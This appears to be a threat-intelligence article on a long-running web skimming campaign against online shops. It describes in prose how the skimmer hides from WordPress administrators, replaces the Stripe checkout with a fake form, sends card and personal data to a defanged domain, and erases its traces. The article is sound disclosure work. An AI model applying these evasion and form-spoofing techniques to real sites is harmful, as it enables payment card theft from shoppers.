Web Skimming Attack Campaign
Cybersecurity researchers have uncovered a large-scale web skimming campaign that has remained active since January 2022. The operation targets enterprise organizations that rely on major payment networks, including American Express, Diners Club, Discover, JCB Co., Ltd., Mastercard, and UnionPay. Companies that integrate these payment services into their online checkout systems are assessed to be at the highest risk.
Table of Contents
Digital Skimming and the Evolution of Magecart
Digital skimming attacks are a form of client-side compromise in which threat actors inject malicious JavaScript into legitimate e-commerce sites and payment portals. The injected code silently harvests credit card data and personal information as customers enter their payment details.
This activity falls under the broader category commonly known as Magecart. The term originally described a loose collection of cybercriminal groups focused on Magento-based e-commerce sites, but it has since expanded to cover skimming operations across many platforms and technologies.
Infrastructure Tied to Sanctions Evasion
The campaign was identified during an investigation into a suspicious domain associated with Stark Industries, a bulletproof hosting provider that has been sanctioned. Its parent company, PQ.Hosting, later rebranded the service as THE.Hosting, now operated by the Dutch entity WorkTitans B.V., reportedly as a way to evade sanctions.
The domain cdn-cookie(dot)com was found hosting heavily obfuscated JavaScript files such as 'recorder.js' and 'tab-gtm.js.' These scripts were embedded into compromised online shops, where they enabled covert credit card skimming.
Stealth Through Self-Destruction and Environmental Awareness
The skimmer was engineered to actively evade detection by site administrators. It inspects the Document Object Model for the presence of 'wpadminbar,' a toolbar element visible when WordPress administrators or privileged users are logged in. If this element is detected, the malware immediately triggers a self-removal routine, deleting itself from the page.
To maintain persistence during normal browsing, the skimmer attempts execution each time the page's DOM changes, a common occurrence during user interaction on modern websites.
Weaponizing Stripe with Interface Manipulation
The malicious code contains specific logic designed to exploit Stripe-based checkout flows. When Stripe is selected, the skimmer checks for a localStorage entry named 'wc_cart_hash.' If the value does not exist, it creates the key and prepares to harvest data.
At that point, the malware dynamically replaces the legitimate Stripe payment form with a counterfeit one. Through subtle interface manipulation, victims are deceived into entering their card number, expiration date, and CVC into the fake form.
After submission, the page returns an error message, making it appear as though the payment failed due to incorrect information rather than malicious interference.
Data Theft, Exfiltration, and Cleanup
The stolen information goes beyond payment card details and includes full names, phone numbers, email addresses, and shipping addresses. The skimmer transmits this data via an HTTP POST request to lasorie(dot)com.
Once the exfiltration process is complete, the malware removes the fake form, restores the legitimate Stripe interface, and deletes traces of its activity from the checkout page. It then sets 'wc_cart_hash' to 'true,' ensuring the skimmer does not run again for the same victim.
An Attack Chain Built on Deep Platform Knowledge
Researchers note that the threat actor demonstrates an advanced understanding of WordPress internals and leverages even lesser-known platform features as part of the attack flow. This depth of knowledge, combined with sophisticated evasion and interface manipulation techniques, underscores the maturity and persistence of the operation.
